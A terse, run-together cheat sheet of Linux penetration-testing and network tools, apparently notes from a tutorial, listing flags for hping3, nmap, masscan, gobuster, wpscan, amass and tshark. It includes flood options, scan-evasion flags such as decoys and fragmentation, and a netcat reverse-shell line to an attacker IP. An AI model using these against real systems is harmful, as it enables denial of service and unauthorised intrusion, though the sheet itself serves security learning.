Jul 16, 2024
ping
-S: Specify packet size.-F: Flood with large packets.apt install iftopapt install hping3-S: TCP packet.-V: Verbose mode.-F/--flood: Flood mode.-1: ICMP packets for trace route.-P: Specify port.-A: Set ACK flag.--baseport: Change base port.apt install ptunneltcpdump:
apt install tcpdumptcpdump -i any icmpcommand | vim -%! to edit and process output.apt install nmap-sn: Host discovery without port scan.-sV: Service version detection.-O: OS detection.-Pn: No ping.-sL: List hosts in network.--script vol: Vulnerability scan.--script malware: Malware scan.-A: Aggressive scan.-F: Fragment packets.--source-port: Change source port.-D: Decoys.apt install masscan--rate: Set scan rate.--randomize-hosts: Randomize scan order.alias sl='cat /dev/urandom'apt install whoiswhois microsoft.com).apt install whatwebwhatweb networkchuck.coffee).curl -I http://example.comcurl -H 'Authorization: token' http://example.comapt install niktonikto -h networkchuck.coffee).apt install gobusterdir: Directory mode.-u: Specify URL.-w: Wordlist.dns: Subdomain enumeration.apt install seclistsapt install sublist3rsublist3r -d networkchuck.comapt install wpscan--url: URL.-e u: Enumerate users.--api-token: API token for extended features.apt install amassamass enum -d networkchuck.comamass enum -passive -d networkchuck.comapt install gitgit clone <repo>git.searchploit sshsearchploit -uapt install tmuxtmux new -s nameCtrl+B, Dtmux lstmux attach -t namessh user@host commandssh -D -C -q -N user@hostapt install netcat-traditionalnc -e /bin/sh attackerIP portnc -lvp porttcpdump -i interface -w file.pcaptcpdump -r file.pcapapt install tsharktshark -i eth0 -w capture.pcaptshark -r capture.pcaptshark -Y 'http.request.method == "GET"'